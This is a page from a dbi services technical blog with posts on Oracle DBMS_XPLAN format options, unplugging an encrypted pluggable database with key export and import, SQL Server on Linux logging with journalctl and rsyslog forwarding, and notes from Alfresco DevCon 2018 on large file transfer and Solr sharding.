Yann Neuhaus

dbi services technical blog

Explain Plan format

Wed, 2018-01-24 10:57

The DBMS_XPLAN format accepts a lot of options, which are not all documented. Here is a small recap of available information.

The minimum that is displayed is the Plan Line Id, the Operation, and the Object Name. You can add columns and/or sections with options, such as ‘rows’, optionally starting with a ‘+’ like ‘+rows’. Some options group several additional pieces of information, such as ‘typical’, which is also the default, or ‘basic’, ‘all’, ‘advanced’. You can choose one of them and remove some columns with ‘-’, such as ‘typical -rows -bytes -cost -plan_hash -predicate -remote -parallel -partition -note’. Finally, from a cursor executed with plan statistics, you can show all execution statistics with ‘allstats’, and the last execution statistics with ‘allstats last’. Subsets of ‘allstats’ are ‘rowstats’, ‘memstats’, ‘iostats’, ‘buffstats’.

Of course, the column/section is displayed only if the information is present.

This blog post shows what is displayed by which option, as of 12cR2, probably with some combinations missing.
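As a quick reminder before going through the options, the format string is simply passed to the DBMS_XPLAN table functions, for example to DISPLAY after an EXPLAIN PLAN or to DISPLAY_CURSOR for a cursor in the shared pool (the sql_id and child number below are placeholders):

SQL> explain plan for select * from dual;
SQL> select * from table(dbms_xplan.display(format=>'basic +rows +cost +alias'));
SQL> select * from table(dbms_xplan.display_cursor('a1b2c3d4e5f6g',0,'typical -bytes +outline'));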

+plan_hash, or BASIC


PLAN_TABLE_OUTPUT
-----------------
Plan hash value: 1338588353

Plan hash value: is displayed by ‘basic +plan_hash’ or ‘typical’ or ‘all’ or ‘advanced’

+rows +bytes +cost +partition +parallel, or TYPICAL


-----------------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | Pstart| Pstop | TQ/Ins |IN-OUT| PQ Distrib |
-----------------------------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 287 | 19516 | 5 (20)| 00:00:01 | | | | | |
| 1 | PX COORDINATOR | | | | | | | | | | |
| 2 | PX SEND QC (ORDER) | :TQ10002 | 287 | 19516 | 5 (20)| 00:00:01 | | | Q1,02 | P->S | QC (ORDER) |
| 3 | SORT ORDER BY | | 287 | 19516 | 5 (20)| 00:00:01 | | | Q1,02 | PCWP | |
| 4 | PX RECEIVE | | 287 | 19516 | 4 (0)| 00:00:01 | | | Q1,02 | PCWP | |
| 5 | PX SEND RANGE | :TQ10001 | 287 | 19516 | 4 (0)| 00:00:01 | | | Q1,01 | P->P | RANGE |
|* 6 | HASH JOIN | | 287 | 19516 | 4 (0)| 00:00:01 | | | Q1,01 | PCWP | |
| 7 | PX BLOCK ITERATOR | | 14 | 532 | 2 (0)| 00:00:01 | 1 | 1 | Q1,01 | PCWC | |
| 8 | TABLE ACCESS FULL | EMP | 14 | 532 | 2 (0)| 00:00:01 | 1 | 1 | Q1,01 | PCWP | |
| 9 | BUFFER SORT | | | | | | | | Q1,01 | PCWC | |
| 10 | PX RECEIVE | | 82 | 2460 | 2 (0)| 00:00:01 | | | Q1,01 | PCWP | |
| 11 | PX SEND BROADCAST| :TQ10000 | 82 | 2460 | 2 (0)| 00:00:01 | | | | S->P | BROADCAST |
| 12 | REMOTE | DEPT | 82 | 2460 | 2 (0)| 00:00:01 | | | LOOPB~ | R->S | |
-----------------------------------------------------------------------------------------------------------------------------------

Rows or E-Rows: is displayed by ‘basic +rows’ or ‘typical’ or ‘all’ or ‘advanced’
Bytes or E-Bytes: is displayed by ‘basic +bytes’ or ‘typical’ or ‘all’ or ‘advanced’
Cost: is displayed by ‘basic +cost’ or ‘typical’ or ‘all’ or ‘advanced’
TmpSpc or E-Temp: is displayed by ‘basic +bytes’ or ‘typical’ or ‘all’ or ‘advanced’
Time or E-Time: is displayed by ‘typical’ or ‘all’ or ‘advanced’
Pstart/Pstop: is displayed by ‘basic +partition’ or ‘typical’ or ‘all’ or ‘advanced’
TQ/Ins, IN-OUT, PQ Distrib: is displayed by ‘basic +parallel’ or ‘typical’ or ‘all’ or ‘advanced’

The ‘A-’ and ‘E-’ prefixes are used when displaying execution statistics, to differentiate estimations from actual numbers.

+alias


Query Block Name / Object Alias (identified by operation id):
-------------------------------------------------------------
 
1 - SEL$58A6D7F6
8 - SEL$58A6D7F6 / EMP@SEL$1
12 - SEL$58A6D7F6 / DEPT@SEL$1

Query Block Name / Object Alias: is displayed by ‘basic +alias’ or ‘typical +alias’ or ‘all’ or ‘advanced’

+outline


Outline Data
-------------
 
/*+
BEGIN_OUTLINE_DATA
PQ_DISTRIBUTE(@"SEL$58A6D7F6" "DEPT"@"SEL$1" NONE BROADCAST)
USE_HASH(@"SEL$58A6D7F6" "DEPT"@"SEL$1")
LEADING(@"SEL$58A6D7F6" "EMP"@"SEL$1" "DEPT"@"SEL$1")
FULL(@"SEL$58A6D7F6" "DEPT"@"SEL$1")
FULL(@"SEL$58A6D7F6" "EMP"@"SEL$1")
OUTLINE(@"SEL$1")
OUTLINE(@"SEL$2")
MERGE(@"SEL$1" >"SEL$2")
OUTLINE_LEAF(@"SEL$58A6D7F6")
ALL_ROWS
DB_VERSION('12.2.0.1')
OPTIMIZER_FEATURES_ENABLE('12.2.0.1')
IGNORE_OPTIM_EMBEDDED_HINTS
END_OUTLINE_DATA
*/

Outline Data: is displayed by ‘basic +outline’ or ‘typical +outline’ or ‘all +outline’ or ‘advanced’

+peeked_binds


Peeked Binds (identified by position):
--------------------------------------
 
1 - :X (VARCHAR2(30), CSID=873): 'x'

Peeked Binds: is displayed by ‘basic +peeked_binds’ or ‘typical +peeked_binds’ or ‘all +peeked_binds’ or ‘advanced’

+predicate


Predicate Information (identified by operation id):
---------------------------------------------------
 
6 - access("EMP"."DEPTNO"="DEPT"."DEPTNO")

Predicate Information: is displayed by ‘basic +predicate’ or ‘typical’ or ‘all’ or ‘advanced’

+projection


Column Projection Information (identified by operation id):
-----------------------------------------------------------
 
1 - INTERNAL_FUNCTION("DEPT"."DEPTNO")[22], "EMP"."EMPNO"[NUMBER,22], "EMP"."ENAME"[VARCHAR2,10],
    "EMP"."JOB"[VARCHAR2,9], "EMP"."MGR"[NUMBER,22], "EMP"."HIREDATE"[DATE,7], "EMP"."SAL"[NUMBER,22],
    "EMP"."COMM"[NUMBER,22], "DEPT"."DNAME"[VARCHAR2,14], "DEPT"."LOC"[VARCHAR2,13]
2 - (#keys=0) INTERNAL_FUNCTION("DEPT"."DEPTNO")[22], "EMP"."EMPNO"[NUMBER,22], "EMP"."ENAME"[VARCHAR2,10],
    "EMP"."JOB"[VARCHAR2,9], "EMP"."MGR"[NUMBER,22], "EMP"."HIREDATE"[DATE,7], "EMP"."SAL"[NUMBER,22],
    "EMP"."COMM"[NUMBER,22], "DEPT"."DNAME"[VARCHAR2,14], "DEPT"."LOC"[VARCHAR2,13]
3 - (#keys=1) INTERNAL_FUNCTION("DEPT"."DEPTNO")[22], "EMP"."EMPNO"[NUMBER,22], "EMP"."ENAME"[VARCHAR2,10],
    "EMP"."JOB"[VARCHAR2,9], "EMP"."MGR"[NUMBER,22], "EMP"."HIREDATE"[DATE,7], "EMP"."SAL"[NUMBER,22],
    "EMP"."COMM"[NUMBER,22], "DEPT"."DNAME"[VARCHAR2,14], "DEPT"."LOC"[VARCHAR2,13]
4 - INTERNAL_FUNCTION("DEPT"."DEPTNO")[22], "EMP"."EMPNO"[NUMBER,22], "EMP"."ENAME"[VARCHAR2,10],
    "EMP"."JOB"[VARCHAR2,9], "EMP"."MGR"[NUMBER,22], "EMP"."HIREDATE"[DATE,7], "EMP"."SAL"[NUMBER,22],
    "EMP"."COMM"[NUMBER,22], "DEPT"."DNAME"[VARCHAR2,14], "DEPT"."LOC"[VARCHAR2,13]

Column Projection Information: is displayed by ‘basic +projection’ or ‘typical +projection’ or ‘all’ or ‘advanced’

+remote


Remote SQL Information (identified by operation id):
----------------------------------------------------
 
12 - SELECT "DEPTNO","DNAME","LOC" FROM "DEPT" "DEPT" (accessing 'LOOPBACK' )

Remote SQL Information: is displayed by ‘basic +remote’ or ‘typical’ or ‘all’ or ‘advanced’

+metrics


Sql Plan Directive information:
-------------------------------
 
Used directive ids:
9695481911885124390

Sql Plan Directive information: is displayed by ‘+metrics’

+note

The Note section can show information about SQL Profiles, SQL Patch, SQL Plan Baseline, Outlines, Dynamic Sampling, Degree of Parallelism, Parallel Query, Parallel DML, Create Index Size, Cardinality Feedback, Rely Constraints used for transformation, Sub-Optimal XML, Adaptive Plan, GTT private statistics,…


Note
-----
- Degree of Parallelism is 2 because of table property
- dynamic statistics used: dynamic sampling (level=2)
- 1 Sql Plan Directive used for this statement
- this is an adaptive plan (rows marked '-' are inactive)

Note: is displayed by ‘basic +note’ or ‘typical’ or ‘all’ or ‘advanced’

+adaptive


---------------------------------------------------------------------------------------
| Id | Operation | Name |Starts|E-Rows| A-Rows|
---------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 0 |
| 1 | HASH UNIQUE | | 1 | 1 | 0 |
| * 2 | HASH JOIN SEMI | | 1 | 1 | 0 |
|- 3 | NESTED LOOPS SEMI | | 1 | 1 | 7 |
|- 4 | STATISTICS COLLECTOR | | 1 | | 7 |
| * 5 | TABLE ACCESS FULL | DEPARTMENTS | 1 | 1 | 7 |
|- * 6 | TABLE ACCESS BY INDEX ROWID BATCHED| EMPLOYEES | 0 | 1 | 0 |
|- * 7 | INDEX RANGE SCAN | EMP_DEP_IX | 0 | 10 | 0 |
| * 8 | TABLE ACCESS FULL | EMPLOYEES | 1 | 1 | 1 |
---------------------------------------------------------------------------------------

Inactive branches of adaptive plan: is displayed by ‘+adaptive’

+report


Reoptimized plan:
-----------------
This cursor is marked for automatic reoptimization. The plan that is
expected to be chosen on the next execution is displayed below.

Reoptimized plan: is displayed by ‘+report’

ALLSTATS


---------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | OMem | 1Mem | O/1/M |
---------------------------------------------------------------------------------------------------------------------------

Starts: is displayed by ‘basic +rowstats’, ‘basic +allstats’
A-Rows: is displayed by ‘basic +rowstats’, ‘basic +allstats’
A-Time: is displayed by ‘typical +rowstats’, ‘basic +allstats’
Buffers, Reads, Writes: is displayed by ‘basic +buffstats’, ‘basic +iostats’, ‘basic +allstats’
OMem, 1Mem, O/1/M, Used-Mem: is displayed by ‘basic +memstats’, ‘basic +allstats’
Max-Tmp, Used-Tmp: is displayed by ‘basic +memstats’, ‘typical +allstats’

With summed stats, O/1/M and Max-Tmp are used for the headers. With last stats, Used-Mem and Used-Tmp.
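Remember that those columns can only be filled when execution statistics are actually collected, for example with the gather_plan_statistics hint or statistics_level=all, before displaying the cursor. A minimal sketch (the query is just an example):

SQL> alter session set statistics_level=all;
SQL> select /*+ gather_plan_statistics */ count(*) from emp;
SQL> select * from table(dbms_xplan.display_cursor(format=>'allstats last'));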

 


Unplug an Encrypted PDB (ORA-46680: master keys of the container database must be exported)

Sat, 2018-01-20 16:16

In the Oracle Database Cloud DBaaS you provision a multitenant database where tablespaces are encrypted. This means that when you unplug/plug the pluggable databases, you also need to export/import the encryption keys. You cannot just copy the wallet, because the wallet contains all CDB keys. Usually, you can be guided by the error messages, but this one needs a little explanation and an example.

Here I’ll unplug PDB6 from CDB1 and plug it into CDB2

[oracle@VM122 blogs]$ connect /@CDB1 as sysdba
SQLcl: Release 17.4.0 Production on Fri Jan 19 22:22:44 2018
Copyright (c) 1982, 2018, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
 
22:22:46 SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ ---------- ------------ ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
5 PDB6 READ WRITE NO

Here are the master keys:

SQL> select con_id,tag,substr(key_id,1,6)||'...' "KEY_ID...",creator,key_use,keystore_type,origin,creator_pdbname,activating_pdbname from v$encryption_keys;
 
CON_ID TAG KEY_ID... CREATOR KEY_USE KEYSTORE_TYPE ORIGIN CREATOR_PDBNAME ACTIVATING_PDBNAME
------ --- --------- ------- ------- ------------- ------ --------------- ------------------
1 cdb1 AcyH+Z... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL CDB$ROOT CDB$ROOT
3 pdb6 Adnhnu... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL PDB6 PDB6

Export keys and Unplug PDB

Let’s try to unplug PDB6:
22:22:51 SQL> alter pluggable database PDB6 close immediate;
Pluggable database PDB6 altered.
 
22:23:06 SQL> alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml';
 
Error starting at line : 1 in command -
alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml'
Error report -
ORA-46680: master keys of the container database must be exported

This message is not clear. You don’t export the container database (CDB) key. You have to export the PDB ones.

Then, I have to open the PDB, switch to it, and export the key:

SQL> alter session set container=PDB6;
Session altered.
 
SQL> administer key management set keystore open identified by "k3yCDB1";
Key MANAGEMENT succeeded.
 
SQL> administer key management
2 export encryption keys with secret "this is my secret password for the export"
3 to '/var/tmp/PDB6.p12'
4 identified by "k3yCDB1"
5 /
 
Key MANAGEMENT succeeded.

Note that I opened the keystore with a password. If you use an autologin wallet, you have to close it in the CDB$ROOT and re-open it with the password.
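If you are in that case, the switch looks like this (a minimal sketch, run in CDB$ROOT with your own keystore password):

SQL> administer key management set keystore close;
SQL> administer key management set keystore open identified by "k3yCDB1";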

Now I can unplug the database:

SQL> alter pluggable database PDB6 close immediate;
Pluggable database PDB6 altered.
 
SQL> alter pluggable database PDB6 unplug into '/var/tmp/PDB6.xml';
Pluggable database PDB6 altered.

Plug PDB and Import keys

I’ll plug it in CDB2:

SQL> connect /@CDB2 as sysdba
Connected.
SQL> create pluggable database PDB6 using '/var/tmp/PDB6.xml' file_name_convert=('/CDB1/PDB6/','/CDB2/PDB6/');
Pluggable database PDB6 created.

When I open it, I get a warning:

18:05:45 SQL> alter pluggable database PDB6 open;
ORA-24344: success with compilation error
24344. 00000 - "success with compilation error"
*Cause: A sql/plsql compilation error occurred.
*Action: Return OCI_SUCCESS_WITH_INFO along with the error code
 
Pluggable database PDB6 altered.

The PDB is opened in restricted mode and then I have to import the wallet:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
6 PDB6 READ WRITE YES
 
SQL> select name,cause,type,status,message,action from pdb_plug_in_violations;
 
NAME CAUSE TYPE STATUS MESSAGE ACTION
---- ----- ---- ------ ------- ------
PDB6 Wallet Key Needed ERROR PENDING PDB needs to import keys from source. Import keys from source.

Then I open the destination CDB wallet and import the PDB keys into it:

SQL> alter session set container=PDB6;
Session altered.
 
SQL> administer key management set keystore open identified by "k3yCDB2";
Key MANAGEMENT succeeded.
 
SQL> administer key management
2 import encryption keys with secret "this is my secret password for the export"
3 from '/var/tmp/PDB6.p12'
4 identified by "k3yCDB2"
5 with backup
6 /
 
Key MANAGEMENT succeeded.

Now the PDB can be opened for all sessions:

SQL> alter session set container=CDB$ROOT;
Session altered.
 
SQL> alter pluggable database PDB6 close;
Pluggable database PDB6 altered.
 
SQL> alter pluggable database PDB6 open;
Pluggable database PDB6 altered.

Here is a confirmation that the PDB has the same key as in the origin CDB:

SQL> select con_id,tag,substr(key_id,1,6)||'...' "KEY_ID...",creator,key_use,keystore_type,origin,creator_pdbname,activating_pdbname from v$encryption_keys;
 
CON_ID TAG KEY_ID... CREATOR KEY_USE KEYSTORE_TYPE ORIGIN CREATOR_PDBNAME ACTIVATING_PDBNAME
------ --- --------- ------- ------- ------------- ------ --------------- ------------------
1 cdb2 AdTdo9... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL CDB$ROOT CDB$ROOT
4 pdb1 Adnhnu... SYS TDE IN PDB SOFTWARE KEYSTORE LOCAL PDB6 PDB6

 


SQL Server on Linux and logging

Fri, 2018-01-19 01:39

In the Windows world, SQL Server logs information both into the SQL Server error log and into the Application log. Both automatically timestamp all recorded events. Unlike the SQL Server error log, the Windows Application log provides an overall picture of the events that occur globally on the Windows operating system. Thus, when investigating issues, taking a look at such event logs – by using either the Windows event viewer or the Get-EventLog PowerShell cmdlet – may be very helpful to figure out whether they are only SQL Server-scoped or whether you have to correlate them with other operating system issues.

But what about SQL Server on Linux? Obviously, we may use the same logging approach. As on Windows, SQL Server logs information both in the SQL Server error log, located in /var/opt/mssql/log/, and in the Linux logs. Because SQL Server is only supported on Linux distributions that all include systemd (RHEL 7.3+, SLES v12 SP2+ or Ubuntu 16.04+), we have to go through the journalctl command to browse the messages related to the SQL Server instance.
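The SQL Server error log itself can of course still be read directly from the file system, for instance (a trivial example on a default installation):

[root@sqllinux ~] tail -n 50 /var/opt/mssql/log/errorlog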

systemd-journald is a system service that collects and stores logging data based on logging information that is received from a variety of sources – Kernel and user log messages. All can be viewed through the journalctl command.

Let’s say that the journalctl command is very powerful and I don’t aim to cover all its possibilities. My intention is only to dig into some examples in the context of SQL Server. Conceptually this is not so different from what we usually do on Windows systems for basic stuff.

Firstly, let’s say we may use a couple of options to filter the records we want to display. Probably the most intuitive way to go through the journalctl command is to use the time interval parameters --since and --until as follows:

[root@sqllinux ~] journalctl --since "2018-01-16 12:00:00" --until "2018-01-16 23:30:00"

Here is a sample of the corresponding output:

[Screenshot: journalctl output with time interval filter]

All log messages are displayed, including the kernel ones. But rather than using time interval filters, we may prefer to use the -b parameter to show all log messages since the last system boot, for instance:

[root@sqllinux ~] journalctl -b

The corresponding output:

[Screenshot: journalctl output with last boot filter]

You may use different commands to get the last system boot time, such as uptime or who -b. I’m in favour of last reboot because it provides the last reboot date rather than the uptime of the system.

Furthermore, one interesting point is that if you want to get log messages from older system boots (and not only the last one), you have to configure systemd-journald accordingly to enable log persistence. By default, the journal is volatile and logs are cleared after each system reboot. You may get this information directly from the systemd-journald configuration file (#Storage=auto by default):

[root@sqllinux ~] cat /etc/systemd/journald.conf
…
[Journal]
#Storage=auto
#Compress=yes
#Seal=yes
…

I remembered a customer case where I had to diagnose a database integrity check job, scheduled every Sunday, that failed randomly. We finally figured out that the root cause was a system reboot after an automatic update. But the tricky part was that not every system reboot caused the DBCC CHECKDB command to fail and, according to the information from the Windows log, we understood it depended mostly on the DBCC CHECKDB execution time, which sometimes exceeded the time scheduled for the system reboot. So, in this case, going back to the previous reboots (before the last one) was helpful for us. Let’s say that for some Linux distributions persistence is not the default option and my colleague Daniel Westermann in the dbi services open source team explained it well through his blog post, including how to change the default behavior.
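A minimal sketch of that change (assuming the stock journald.conf shown above):

[root@sqllinux ~] mkdir -p /var/log/journal
[root@sqllinux ~] sed -i 's/^#Storage=auto/Storage=persistent/' /etc/systemd/journald.conf
[root@sqllinux ~] systemctl restart systemd-journald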

So, after applying the correct setup, if you want to display log messages after a pre-defined boot time you may first identify the different system boot times logged into the journal as follows:

[root@sqllinux ~] journalctl --list-boots
-1 576f0fb259f4433083c05329614d749e Tue 2018-01-16 15:41:15 CET—Wed 2018-01-17 20:30:41 CET
 0 ea3ec7019f8446959cfad0bba517a47e Wed 2018-01-17 20:33:30 CET—Wed 2018-01-17 20:37:05 CET

Then you may rewind the journal until the corresponding offset:

[root@sqllinux ~] journalctl -b -1 
-- Logs begin at Tue 2018-01-16 15:41:15 CET, end at Wed 2018-01-17 20:37:40 CET. --
Jan 16 15:41:15 localhost.localdomain systemd-journal[105]: Runtime journal is using 8.0M (max allowed 188.7M, trying to leave 283.1M free
 of 1.8G available → current limit 188.7M).
….

Let’s go ahead with filtering by unit (the mssql-server unit). This is likely the most useful way for DBAs to display only SQL Server related records, in combination with the aforementioned options (time interval or last boot(s) parameters). In the following example, I want to display SQL Server related records since a system boot that occurred on 18 January 2018 20:39 (I may also deal with time interval filters):

[root@sqllinux ~] journalctl -b -1 -u mssql-server.service 
-- Logs begin at Tue 2018-01-16 15:41:15 CET, end at Wed 2018-01-17 20:39:55 CET. --
Jan 16 15:41:17 sqllinux.dbi-services.test systemd[1]: [/usr/lib/systemd/system/mssql-server.service:21] Unknown lvalue 'TasksMax' in sect
ion 'Service'
Jan 16 20:47:15 sqllinux.dbi-services.test systemd[1]: Started Microsoft SQL Server Database Engine.
Jan 16 20:47:15 sqllinux.dbi-services.test systemd[1]: Starting Microsoft SQL Server Database Engine
...
Jan 16 20:47:22 sqllinux.dbi-services.test sqlservr[1119]: 2018-01-16 20:47:22.35 Server      Microsoft SQL Server 2017 (RTM-CU2) (KB40525
74) - 14.0.3008.27 (X64)
…

You may also want to get only the errors concerning your SQL Server instance. If you have already used syslog in the past, you will be comfortable with systemd-journald, which implements the standard syslog message levels and priorities. Indeed, each message has its own priority, as shown below. The counterparts in the Windows event log are the event types (warning, error, critical etc …). On Linux, priorities are identified by a number – 6 corresponds to info messages and 3 to error messages. Here is a log message’s anatomy with the priority value:

[root@sqllinux ~] journalctl -b -1 -u mssql-server.service -n 1 -o verbose
-- Logs begin at Tue 2018-01-16 15:41:15 CET, end at Wed 2018-01-17 20:48:36 CET. --
Wed 2018-01-17 20:30:38.937388 CET [s=5903eef6a5fd45e584ce03a4ae329ac3;i=88d;b=576f0fb259f4433083c05329614d749e;m=13e34d5fcf;t=562fde1d9a1
    PRIORITY=6
    _UID=0
    _GID=0
    _BOOT_ID=576f0fb259f4433083c05329614d749e
    _MACHINE_ID=70f4e4633f754037916dfb35844b4b16
    SYSLOG_FACILITY=3
    SYSLOG_IDENTIFIER=systemd
    CODE_FILE=src/core/job.c
    CODE_FUNCTION=job_log_status_message
    RESULT=done
    _TRANSPORT=journal
    _PID=1
    _COMM=systemd
    _EXE=/usr/lib/systemd/systemd
    _CAP_EFFECTIVE=1fffffffff
    _SYSTEMD_CGROUP=/
    CODE_LINE=784
    MESSAGE_ID=9d1aaa27d60140bd96365438aad20286
    _HOSTNAME=sqllinux.dbi-services.test
    _CMDLINE=/usr/lib/systemd/systemd --switched-root --system --deserialize 21
    _SELINUX_CONTEXT=system_u:system_r:init_t:s0
    UNIT=mssql-server.service
    MESSAGE=Stopped Microsoft SQL Server Database Engine.
    _SOURCE_REALTIME_TIMESTAMP=1516217438937388

 

So, if you want to restrict the output further to only warning, error or critical messages (from a daemon point of view), you may have to add the -p option with a range of priorities from 2 (critical) to 4 (warning) as shown below:

[root@sqllinux ~] journalctl -p 2..4 -u mssql-server.service
-- Logs begin at Tue 2018-01-16 15:41:15 CET, end at Wed 2018-01-17 21:44:04 CET. --
Jan 16 15:41:17 sqllinux.dbi-services.test systemd[1]: [/usr/lib/systemd/system/mssql-server.service:21] Unknown lvalue 'TasksMax' in sect
-- Reboot --
Jan 17 15:27:42 sqllinux.dbi-services.test systemd[1]: [/usr/lib/systemd/system/mssql-server.service:21] Unknown lvalue 'TasksMax' in sect
lines 1-4/4 (END)

Ultimately, filtering by message will probably be the most natural way to find out log messages. Let’s say in this case there are no built-in parameters or options provided by the journalctl command, so grep will be your friend for sure. In the following example, a classic customer case where we want to count the number of failed logins during a specific period, I have to use a combination of the journalctl, grep and wc commands:

[root@sqllinux ~] journalctl -u mssql-server.service --since "2018-01-17 12:00:00" --until "2018-01-17 23:00:00"  | grep "Login failed" | wc -l
31

Finally, the journalctl command offers real-time capabilities to follow log messages through the -f option. For very specific cases it might be useful. In the example below I can use it to follow SQL Server related log messages:

[root@sqllinux ~] journalctl -u mssql-server.service -f
-- Logs begin at Tue 2018-01-16 15:41:15 CET. --
Jan 17 21:52:57 sqllinux.dbi-services.test sqlservr[1121]: 2018-01-17 21:52:57.97 Logon       Error: 18456, Severity: 14, State: 8.
Jan 17 21:52:57 sqllinux.dbi-services.test sqlservr[1121]: 2018-01-17 21:52:57.97 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.40.30]

 

Another topic I wanted to introduce is centralized logging management. Nowadays, plenty of third-party tools like Splunk – or Microsoft tools such as SCOM – may address this need both in the Windows and the Linux worlds. I also remember a specific customer case where we went through the built-in Windows event forwarding mechanism. In the Linux world, you may benefit from plenty of open source tools and you may also rely on built-in tools such as systemd-journal-remote, systemd-journal-upload and systemd-journal-gatewayd. I will probably go further into these tools in the future but this time let’s use an older tool, rsyslog, which implements the basic syslog protocol and extends it with additional features. In this blog post I used a CentOS 7 distro that comes with rsyslog. The good news is that it also includes by default the imjournal module (that provides access to the systemd journal). This module reads logs from /run/log/journal and then writes out /var/log/messages, /var/log/maillog, /var/log/secure or others depending on the record type. Log records may be sent over TCP or UDP protocols and securing capabilities are also provided (by using TLS and certificates for instance).

Just out of curiosity, I decided to implement a very simple log message forwarding scenario to centralize only the SQL Server log messages. Basically, I only had to set up some parameters in /etc/rsyslog.conf on both sides (sender and receiver servers) as well as to apply some firewall rules to allow the traffic on port 514. In addition, I used the TCP protocol because this is probably the simplest way to send log messages (the corresponding modules are already loaded). Here is an illustration of my scenario:

[Diagram: rsyslog forwarding architecture]

Here are the configuration settings of my log message sender. You may notice that I used expression-based filters to send only my SQL Server instance related messages:

[root@sqllinux ~] cat /etc/rsyslog.conf
#### MODULES ####

# The imjournal module bellow is now used as a message source instead of imuxsock.
$ModLoad imuxsock # provides support for local system logging (e.g. via logger command)
$ModLoad imjournal # provides access to the systemd journal
#$ModLoad imklog # reads kernel messages (the same are read from journald)
#$ModLoad immark  # provides --MARK-- message capability
…
# remote host is: name/ip:port, e.g. 192.168.0.1:514, port optional
#*.* @@remote-host:514
if $programname == 'sqlservr' then @@192.168.40.21:514 
…

On the receiver side, I configured the rsyslog daemon to accept messages coming over the TCP protocol on port 514. Here is a sample (only the interesting part) of the configuration file:

[root@sqllinux2 ~] cat /etc/rsyslog.conf
…
# Provides TCP syslog reception
$ModLoad imtcp
$InputTCPServerRun 514
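
On the receiver, the firewall also has to accept the traffic on TCP port 514. With firewalld on CentOS 7, that would look like this (a sketch, assuming the default public zone):

[root@sqllinux2 ~] firewall-cmd --permanent --add-port=514/tcp
[root@sqllinux2 ~] firewall-cmd --reload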

 

Finally, I ran a simple test to check if the log message forwarding process works correctly by using the following T-SQL command from my SQLLINUX instance …

RAISERROR('test syslog from SQLLINUX instance', 10, 1) WITH LOG

 

… and after jumping to the receiver side (SQLLINUX2) I used the tail command to check if my message was sent correctly:

[root@sqllinux2 ~] tail -f /var/log/messages
…
Jan 18 21:50:40 sqllinux sqlservr: 2018-01-18 21:50:40.66 spid57      test syslog
Jan 18 21:51:03 sqllinux sqlservr: 2018-01-18 21:51:03.75 spid57      test syslog 1 2 3
Jan 18 21:52:08 sqllinux sqlservr: 2018-01-18 21:52:08.74 spid52      Using 'dbghelp.dll' version '4.0.5'
Jan 18 21:56:31 sqllinux sqlservr: 2018-01-18 21:56:31.13 spid57      test syslog from SQLLINUX instance

Well done!
In this blog post we’ve surfaced how SQL Server deals with the Linux logging system and how we may use the journalctl command to find information for troubleshooting. Moving from Windows to Linux in this field remains straightforward, with basically the same fundamentals. Obviously, Linux is a command-line oriented operating system, so you will not escape using commands :-)

 


Alfresco DevCon 2018 – Day 2 – Big files, Solr Sharding and Minecraft, again!

Thu, 2018-01-18 13:46

Today is the second day of the Alfresco DevCon 2018 and therefore yes, it is already over, unfortunately. In this blog, I will continue my previous one with the sessions I attended on the afternoon of day-1 as well as on day-2. There were too many interesting sessions and I don’t really have the time to talk about all of them… But if you are interested, all the sessions were recorded (as always) so wait a little bit and check out the DevCon website, the Alfresco Community or the Alfresco YouTube channel and I’m sure you will find all the recordings as soon as they are available.

 

So on the afternoon of day-1, I started with a presentation by Jeff Potts, you all know him, about how to move gigantic files (several gigabytes) in (upload) and out (download) of Alfresco. He basically presented a use case where the users had to manage big files and put them all in Alfresco with the least headache possible. On paper, Alfresco can handle any file no matter the size because the only limit is what the File System of the Alfresco Server supports. However, when you start working with 10 or 20 GB files, you can sometimes have issues like exceptions, timeouts, network outages, aso… It might not be frequent but it can happen for a variety of reasons (not always linked to Alfresco). The use case here was to simplify the import into Alfresco and make it faster. Jeff tested a lot of possible solutions like using the Desktop Sync, CMIS, FTP, the resumable upload Share add-on, aso…

In the end, a pure simple (1 stream) upload/download will always be limited by the network. So he tried to work on improving this part and used the Resilio Sync software (formerly BitTorrent Sync). This tool can be used to stream a file to the Alfresco Server, BitTorrent style (P2P). But the main problem of this solution is that P2P is only as good as the number of users having this specific file available on their workstation… Depending on the use case, it might increase the performance but it wasn’t ideal.

In the end, Jeff came across the protocol “GridFTP”. This is an extension of the FTP for grid computing whose purpose is to make the file transfer more reliable and faster using multiple simultaneous TCP streams. There are several implementations of the GridFTP like the Globus Toolkit. Basically, the solution in this case was to use Globus to transfer the big files from the user’s workstation to a dedicated File System which is mounted on the Alfresco Server. Then using the Alfresco Bulk FileSystem Import Tool (BFSIT), it is really fast to import documents into Alfresco, as soon as they are on the File System of the Alfresco Server. For the download, it is just the opposite (using the BFSET)…

For files smaller than 512Mb, this solution is probably slower than the default Alfresco upload/download actions but for bigger files (or group of files), then it becomes very interesting. Jeff did some tests and basically for one or several files with a total size of 3 or 4GB, then the transfer using Globus and then the import into Alfresco was 50 to 60% faster than the Alfresco default upload/download.

 

Later, Jose Portillo shared Solr Sharding best practices. Sharding is the action of splitting your indexes into Shards (parts of an index) to scale searches and indexing horizontally. The Shards can be stored on a single Solr Server or they can be dispatched over several. Doing this basically increases the search speed because the search is executed on all Shards. For the indexing of a single node, there is no big difference, but for a full reindex it does increase the performance a lot because you index several nodes at the same time on each Shard…

A single Shard can work well (according to the Alfresco Benchmark) with up to 50M documents. Therefore, using Shards is mainly for big repositories but it doesn’t mean that there are no use cases where it would be interesting for smaller repositories, there are! If you want to increase your search/index performance, then start creating Shards much earlier.

For the Solr Sharding, there are two registration options:

  • Manual Sharding => You need to manually configure the IPs/Host where the Shards are located in the Alfresco properties files
  • Dynamic Sharding => Easier to setup and Alfresco automatically provide information regarding the Shards on the Admin interface for easy management

There are several methods of Sharding, which are summarized here:

